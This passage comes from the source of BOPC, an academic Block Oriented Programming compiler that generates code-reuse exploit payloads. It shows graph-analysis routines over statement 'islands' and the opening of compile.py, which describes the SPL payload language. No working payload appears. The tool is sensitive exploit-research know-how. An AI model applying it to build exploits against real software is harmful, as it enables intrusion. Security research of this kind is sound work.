i,j, d in island.edges_iter(data=True): # initialize for K = 1 C[1][i][j] = 1 for k in range(2, K): # main loop for i in island.nodes(): for j in island.nodes(): for x in island.neighbors(i): C[k][i][j] += C[k-1][x][j] # --------------------------------------------------------------------- for k in range(K): dbg_arb(DBG_LVL_1, "Combinations with up to %d statements:", sum(sum(C[k][:][:]))) # --------------------------------------------------------------------------------------------- # __analyze_stmt_min_dist(): Calculate the minimum distance with between any two statements # that have exactly K edges between on a given island. # # :Arg island: The island graph to work on # :Ret: None. # def __analyze_stmt_min_dist( self, island ): ''' B = { } # enumerate all simple paths from i to j # WARNING: O(n!) complexity !!! for i in island.nodes_iter(): for j in island.nodes_iter(): if i == j: continue for x in nx.all_simple_paths(island, i, j): A = [island[a][b]['weight'] for a,b in zip(x, x[1:])] B.setdefault(len(x), []).append(sum(A)) ''' dbg_prnt(DBG_LVL_1, "Starting Analysis: Statement Minimum Distances...") K = 20 # --------------------------------------------------------------------- # Find the minimum distance between any 2 nodes that use exactly K edges. # This is very similar with the algorithm in __analyze_stmt_comb_ctr(), # but with different Dynamic Programming equations: # # M^0_{ii} = 0, forall i in V # M^k_{ij} = M^1_{ij} = weight[i][j], iff (i,j) in E # M^k_{ij} = MIN(M^k_[ij], weight[i][x] + M^{k-1}_{xj}), # for all x adjacent to i # --------------------------------------------------------------------- M = numpy.full((K, island.order(), island.order()), dtype=numpy.int32, fill_value=INFINITY) for i in range(island.order()): # initialize for K = 0 M[0][i][i] = 0 for i,j, d in island.edges_iter(data=True): # initialize for K = 1 M[1][i][j] = d['weight'] for k in range(2, K): # main loop for i in island.nodes(): for j in island.nodes(): for x in island.neighbors(i): M[k][i][j] = min(M[k][i][j], island[i][x]['weight'] + M[k-1][x][j]) # --------------------------------------------------------------------- for k in range(K): m = numpy.min(M[k][:][:]) if m == INFINITY: break dbg_prnt(DBG_LVL_1, "Min shortest path with up to %d statements: %d" % (k, m)) # --------------------------------------------------------------------------------------------- # __analyze_loops(): Analyze the loops on an a given island. # # :Arg island: The island graph to work on # :Ret: None. # def __analyze_loops( self, island ): warn('Loop analysis is not supported yet') # ------------------------------------------------------------------------------------------------- ================================================ FILE: source/compile.py ================================================ #!/usr/bin/env python2 # ------------------------------------------------------------------------------------------------- # # ,ggggggggggg, _,gggggg,_ ,ggggggggggg, ,gggg, # dP"""88""""""Y8, ,d8P""d8P"Y8b, dP"""88""""""Y8, ,88"""Y8b, # Yb, 88 `8b,d8' Y8 "8b,dPYb, 88 `8b d8" `Y8 # `" 88 ,8Pd8' `Ybaaad88P' `" 88 ,8Pd8' 8b d8 # 88aaaad8P" 8P `""""Y8 88aaaad8P",8I "Y88P' # 88""""Y8ba 8b d8 88""""" I8' # 88 `8bY8, ,8P 88 d8 # 88 ,8P`Y8, ,8P' 88 Y8, # 88_____,d8' `Y8b,,__,,d8P' 88 `Yba,,_____, # 88888888P" `"Y8888P"' 88 `"Y8888888 # # The Block Oriented Programming (BOP) Compiler - v2.1 # # # Kyriakos Ispoglou (ispo) - ispo@purdue.edu # PURDUE University, Fall 2016-18 # ------------------------------------------------------------------------------------------------- # # # compile.py: # # This module compiles an program written in SPL into an equivalent Intermediate Representation # (IR) suitable for processing by subsequent modules. Please do not confuse it with the VEX IR. # # SPL is actually a subset of C, so it has the same syntax. Comments are denoted with '//'. Multi # line comments are not supported.The specs of the language (expressed in EBNF) are shown below: # # := 'void' 'payload' '(' ')' '{' '}' # := ( |